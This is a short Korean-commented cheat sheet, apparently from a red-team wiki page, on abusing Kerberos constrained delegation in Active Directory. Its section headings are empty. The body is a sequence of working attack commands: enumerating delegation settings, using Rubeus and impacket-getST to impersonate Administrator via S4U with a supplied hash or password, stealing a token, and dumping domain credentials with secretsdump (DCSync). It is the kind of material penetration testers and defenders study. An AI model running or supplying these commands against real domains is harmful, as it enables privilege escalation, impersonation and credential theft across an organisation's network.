Constrained Delegation

Abuse
Root Cause







References
Last updated








Last updated
# Constrained Delegation이 설정된 머신 열거
Get-ADObject -Filter {msDS-AllowedToDelegateTo -like "*"} -Properties msDS-AllowedToDelegateTo | Select-Object Name, ObjectClass, DistinguishedName, msDS-AllowedToDelegateTo
# 위임이 설정된 계정을 통해 S4U2Self 수행
.\Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:cifs/AD01.CONTOSO.COM /user:user-A /rc4:2B576ACBE6BCFDA7294D6BD18041B8FE /domain:contoso.com /nowrap
# 로그인 세션 생성
.\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:AD01 /username:Administrator /password:FakePass /ticket:doI[...]Q==
# 세션 사용
steal_token 1540# Delegation이 설정된 객체 열거
impacket-findDelegation contoso.com/user-A:'Password123!'
# 서비스에 대한 가장 티켓 발급 요청 및 환경 변수 등록
impacket-getST -spn 'cifs/AD01.CONTOSO.COM' -impersonate Administrator contoso.com/user-A:'Password123!' -force-forwardable
export KRB5CCNAME=Administrator@[email protected]
# DCSync
impacket-secretsdump contoso.com/[email protected] -k -no-pass -dc-ip 192.168.1.11